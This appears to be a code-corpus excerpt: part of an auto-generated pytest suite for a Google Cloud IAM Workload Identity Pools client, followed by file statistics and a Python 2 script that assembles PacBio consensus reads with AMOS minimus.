request = workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.undelete_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_undelete_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.undelete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_undelete_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.undelete_workload_identity_pool_provider(
workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.undelete_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.undelete_workload_identity_pool_provider(
workload_identity_pool.UndeleteWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkloadIdentityPoolsClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkloadIdentityPoolsClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = WorkloadIdentityPoolsClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.WorkloadIdentityPoolsGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.WorkloadIdentityPoolsGrpcTransport,
transports.WorkloadIdentityPoolsGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.WorkloadIdentityPoolsGrpcTransport,
)
def test_workload_identity_pools_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.WorkloadIdentityPoolsTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_workload_identity_pools_base_transport():
# Instantiate the base transport.
with mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.WorkloadIdentityPoolsTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'list_workload_identity_pools',
'get_workload_identity_pool',
'create_workload_identity_pool',
'update_workload_identity_pool',
'delete_workload_identity_pool',
'undelete_workload_identity_pool',
'list_workload_identity_pool_providers',
'get_workload_identity_pool_provider',
'create_workload_identity_pool_provider',
'update_workload_identity_pool_provider',
'delete_workload_identity_pool_provider',
'undelete_workload_identity_pool_provider',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
@requires_google_auth_gte_1_25_0
def test_workload_identity_pools_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkloadIdentityPoolsTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_workload_identity_pools_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkloadIdentityPoolsTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
def test_workload_identity_pools_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.iam_v1beta.services.workload_identity_pools.transports.WorkloadIdentityPoolsTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkloadIdentityPoolsTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_workload_identity_pools_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
WorkloadIdentityPoolsClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_workload_identity_pools_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
WorkloadIdentityPoolsClient()
adc.assert_called_once_with(
scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.WorkloadIdentityPoolsGrpcTransport,
transports.WorkloadIdentityPoolsGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_workload_identity_pools_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.WorkloadIdentityPoolsGrpcTransport,
transports.WorkloadIdentityPoolsGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_workload_identity_pools_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.WorkloadIdentityPoolsGrpcTransport, grpc_helpers),
(transports.WorkloadIdentityPoolsGrpcAsyncIOTransport, grpc_helpers_async)
],
)
def test_workload_identity_pools_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"iam.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
scopes=["1", "2"],
default_host="iam.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("transport_class", [transports.WorkloadIdentityPoolsGrpcTransport, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport])
def test_workload_identity_pools_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
def test_workload_identity_pools_host_no_port():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='iam.googleapis.com'),
)
assert client.transport._host == 'iam.googleapis.com:443'
def test_workload_identity_pools_host_with_port():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='iam.googleapis.com:8000'),
)
assert client.transport._host == 'iam.googleapis.com:8000'
def test_workload_identity_pools_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_workload_identity_pools_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.WorkloadIdentityPoolsGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.WorkloadIdentityPoolsGrpcTransport, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport])
def test_workload_identity_pools_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.WorkloadIdentityPoolsGrpcTransport, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport])
def test_workload_identity_pools_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_workload_identity_pools_grpc_lro_client():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_workload_identity_pools_grpc_lro_async_client():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc_asyncio',
)
transport = client.transport
# Ensure that we have a api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsAsyncClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_workload_identity_pool_path():
project = "squid"
location = "clam"
workload_identity_pool = "whelk"
expected = "projects/{project}/locations/{location}/workloadIdentityPools/{workload_identity_pool}".format(project=project, location=location, workload_identity_pool=workload_identity_pool, )
actual = WorkloadIdentityPoolsClient.workload_identity_pool_path(project, location, workload_identity_pool)
assert expected == actual
def test_parse_workload_identity_pool_path():
expected = {
"project": "octopus",
"location": "oyster",
"workload_identity_pool": "nudibranch",
}
path = WorkloadIdentityPoolsClient.workload_identity_pool_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_workload_identity_pool_path(path)
assert expected == actual
def test_workload_identity_pool_provider_path():
project = "cuttlefish"
location = "mussel"
workload_identity_pool = "winkle"
workload_identity_pool_provider = "nautilus"
expected = "projects/{project}/locations/{location}/workloadIdentityPools/{workload_identity_pool}/providers/{workload_identity_pool_provider}".format(project=project, location=location, workload_identity_pool=workload_identity_pool, workload_identity_pool_provider=workload_identity_pool_provider, )
actual = WorkloadIdentityPoolsClient.workload_identity_pool_provider_path(project, location, workload_identity_pool, workload_identity_pool_provider)
assert expected == actual
def test_parse_workload_identity_pool_provider_path():
expected = {
"project": "scallop",
"location": "abalone",
"workload_identity_pool": "squid",
"workload_identity_pool_provider": "clam",
}
path = WorkloadIdentityPoolsClient.workload_identity_pool_provider_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_workload_identity_pool_provider_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "whelk"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = WorkloadIdentityPoolsClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "octopus",
}
path = WorkloadIdentityPoolsClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "oyster"
expected = "folders/{folder}".format(folder=folder, )
actual = WorkloadIdentityPoolsClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nudibranch",
}
path = WorkloadIdentityPoolsClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "cuttlefish"
expected = "organizations/{organization}".format(organization=organization, )
actual = WorkloadIdentityPoolsClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "mussel",
}
path = WorkloadIdentityPoolsClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "winkle"
expected = "projects/{project}".format(project=project, )
actual = WorkloadIdentityPoolsClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "nautilus",
}
path = WorkloadIdentityPoolsClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "scallop"
location = "abalone"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = WorkloadIdentityPoolsClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "squid",
"location": "clam",
}
path = WorkloadIdentityPoolsClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.WorkloadIdentityPoolsTransport, '_prep_wrapped_messages') as prep:
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.WorkloadIdentityPoolsTransport, '_prep_wrapped_messages') as prep:
transport_class = WorkloadIdentityPoolsClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
with mock.patch.object(type(getattr(client.transport, "grpc_channel")), "close") as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
with mock.patch.object(type(getattr(client.transport, close_name)), "close") as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
'grpc',
]
for transport in transports:
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
| 41.496482 | 304 | 0.708694 | 19,640 | 176,941 | 6.09613 | 0.023625 | 0.107711 | 0.118602 | 0.045136 | 0.940173 | 0.922892 | 0.909645 | 0.887946 | 0.870306 | 0.853276 | 0 | 0.003787 | 0.217926 | 176,941 | 4,263 | 305 | 41.506216 | 0.861419 | 0.18513 | 0 | 0.712183 | 0 | 0 | 0.073343 | 0.03134 | 0 | 0 | 0 | 0.000235 | 0.121834 | 1 | 0.044148 | false | 0.000342 | 0.010267 | 0.000684 | 0.055099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
83ccb50f440569adb2620ce96841ae7a9c25a27d | 7,045 | py | Python | consensus_assembly.py | drmaize/C3S-LAA | 83aeee31f72144b348818ac142eb7878cdbaf211 | [
"MIT"
] | 4 | 2017-12-19T15:35:02.000Z | 2020-05-15T01:13:06.000Z | consensus_assembly.py | drmaize/C3S-LAA | 83aeee31f72144b348818ac142eb7878cdbaf211 | [
"MIT"
] | 1 | 2019-03-11T11:03:45.000Z | 2019-03-11T17:47:09.000Z | consensus_assembly.py | drmaize/C3S-LAA | 83aeee31f72144b348818ac142eb7878cdbaf211 | [
"MIT"
] | 3 | 2018-02-21T20:15:27.000Z | 2021-11-24T08:58:59.000Z | ### C3S-LAA
### Code for demultiplexing and assembly of error corrected PacBio read clusters.
### Version 0.2.2: 05/09/2017
### Author: Felix Francis (felixfrancier@gmail.com), Randall J Wisser (rjw@udel.edu)
############################################################
#Time to run the code: start timer
############################################################
import time
t0 = time.time()
############################################################
#### IMPORT FUNCTIONS
############################################################
import multiprocessing
from Bio import SeqIO
import pandas as pd
import datetime
import re
import os
from pydna import Assembly, Dseqrecord
import subprocess as sp
import os.path
import time
import shutil
from parameters import *
############################################################
#### FUNCTIONS
############################################################
### convert a given fasta file containing sequence reads to afg format and carry out minimus assembly.
def minimus_assembly(barcode_subset, amos_path, consensus_output):
### convert fasta to afg format
if barcode_subset == 1:
reads = consensus_output + barcode_name + "/" + barcode_name + "merged_reads"
else:
reads = consensus_output + "merged_reads"
p = sp.Popen(["%stoAmos" %amos_path,"-s","%s" %reads+".fasta", "-o", "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
### assemble afg reads
p = sp.Popen(["%sminimus" %amos_path, "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
shutil.rmtree(reads+ "_assembly_temp.bnk")
os.remove(reads+ "_assembly_temp.afg.runAmos.log")
os.remove(reads+ "_assembly_temp.afg")
os.remove(reads+ "_assembly_temp.contig")
renamed_assembly = open(consensus_output +"c3slaa_assembly" +".fasta", "w")
fasta_assembly = SeqIO.parse(open(consensus_output + "merged_reads_assembly_temp.fasta"), 'fasta')
for fasta in fasta_assembly:
header, sequence = fasta.id.split('_'), str(fasta.seq)
renamed_assembly.write(">C3SLAA_" +str(header[0]) + "\n")
renamed_assembly.write(sequence + "\n")
renamed_assembly.close()
os.remove(consensus_output +"merged_reads_assembly_temp.fasta")
### convert a given fasta file containing sequence reads to afg format and carry out minimus assembly (barcoded)
def minimus_assembly_barcoded(barcode_name, barcode_subset, amos_path, consensus_output):
### convert fasta to afg format
if barcode_subset == 1:
reads = consensus_output + barcode_name + "/" + barcode_name + "merged_reads"
else:
reads = consensus_output + "merged_reads"
p = sp.Popen(["%stoAmos" %amos_path,"-s","%s" %reads+".fasta", "-o", "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
### assemble afg reads
p = sp.Popen(["%sminimus" %amos_path, "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
shutil.rmtree(reads+ "_assembly_temp.bnk")
os.remove(reads+ "_assembly_temp.afg.runAmos.log")
os.remove(reads+ "_assembly_temp.afg")
os.remove(reads+ "_assembly_temp.contig")
renamed_assembly = open(consensus_output + barcode_name+"c3slaa_assembly" +".fasta", "w")
fasta_assembly = SeqIO.parse(open(consensus_output + barcode_name+ "merged_reads_assembly_temp.fasta"), 'fasta')
for fasta in fasta_assembly:
header, sequence = fasta.id.split('_'), str(fasta.seq)
renamed_assembly.write(">C3SLAA_" +str(header[0]) + "\n")
renamed_assembly.write(sequence + "\n")
renamed_assembly.close()
os.remove(consensus_output + barcode_name +"merged_reads_assembly_temp.fasta")
### pick reads from each barcoded sample and assemble (barcoded)
def pooled_locus_read_assembly_barcoded(primer_info_file, barcode_subset, amos_path,consensus_output):
df_barcodes = pd.read_csv(barcode_list, sep='\t', skiprows=0, header=0)
for index, row in df_barcodes.iterrows():
barcode_name = str(row['f_barcode_name']) + "_" + str(row['r_barcode_name'])
merged_fasta = open(str(consensus_output) + barcode_name + "/"+ barcode_name + "merged_reads" +".fasta", "w")
df_primers = pd.read_csv(primer_info_file, sep='\t', skiprows=0, header=0) ### read primer info
for index, row in df_primers.iterrows():
f_primer_name, r_primer_name = str(row['f_primer_name']), str(row['r_primer_name'])
primer_chr_no, amplicon_start, amplicon_stop = int(f_primer_name.split("_")[1]), int(f_primer_name.split("_")[2]), int(r_primer_name.split("_")[2])
seq_path = str(consensus_output) + barcode_name + "/amplicon_"+ str(primer_chr_no) + "_" + str(amplicon_start) + "_" + str(amplicon_stop) + "/"
fasta_sequences = SeqIO.parse(open(seq_path + "amplicon_analysis.fasta"), 'fasta')
for fasta in fasta_sequences:
header, sequence = fasta.id.split('_'), str(fasta.seq)
no_reads = int(header[3][8:])
if no_reads >= no_reads_threshold:
merged_fasta.write(">" +str(barcode_name) + "_" +str(primer_chr_no) + "_" +str(amplicon_start)+ "_" +str(amplicon_stop) + "\n")
merged_fasta.write(sequence[trim_bp:-trim_bp] + "\n")
merged_fasta.close()
minimus_assembly_barcoded(barcode_name, barcode_subset, amos_path, consensus_output)
### pick reads from each sample and assemble (no barcodes)
def pooled_locus_read_assembly(primer_info_file, barcode_subset, amos_path,consensus_output):
merged_fasta = open(str(consensus_output) + "merged_reads" +".fasta", "w")
df_primers = pd.read_csv(primer_info_file, sep='\t', skiprows=0, header=0) ### read primer info
for index, row in df_primers.iterrows():
f_primer_name, r_primer_name = str(row['f_primer_name']), str(row['r_primer_name'])
primer_chr_no, amplicon_start, amplicon_stop = int(f_primer_name.split("_")[1]), int(f_primer_name.split("_")[2]), int(r_primer_name.split("_")[2])
seq_path = str(consensus_output) + "/amplicon_"+ str(primer_chr_no) + "_" + str(amplicon_start) + "_" + str(amplicon_stop) + "/"
fasta_sequences = SeqIO.parse(open(seq_path + "amplicon_analysis.fasta"), 'fasta')
for fasta in fasta_sequences:
header, sequence = fasta.id.split('_'), str(fasta.seq)
no_reads = int(header[3][8:])
if no_reads >= no_reads_threshold:
merged_fasta.write(">" +str(primer_chr_no) + "_" +str(amplicon_start)+ "_" +str(amplicon_stop) + "\n")
merged_fasta.write(sequence[trim_bp:-trim_bp] + "\n")
merged_fasta.close()
minimus_assembly(barcode_subset, amos_path, consensus_output)
############################################################
#### CODE
############################################################
if __name__ == '__main__':
if barcode_subset == 1:
pooled_locus_read_assembly_barcoded(primer_info_file, barcode_subset, amos_path,consensus_output)
elif barcode_subset ==0:
pooled_locus_read_assembly(primer_info_file, barcode_subset, amos_path,consensus_output)
#############################################
#Time to run the code: end timer
############################################################
t1 = time.time()
total = t1-t0
total = ("{0:.2f}".format(round(total,2)))
print "total time to run = ", total, " seconds"
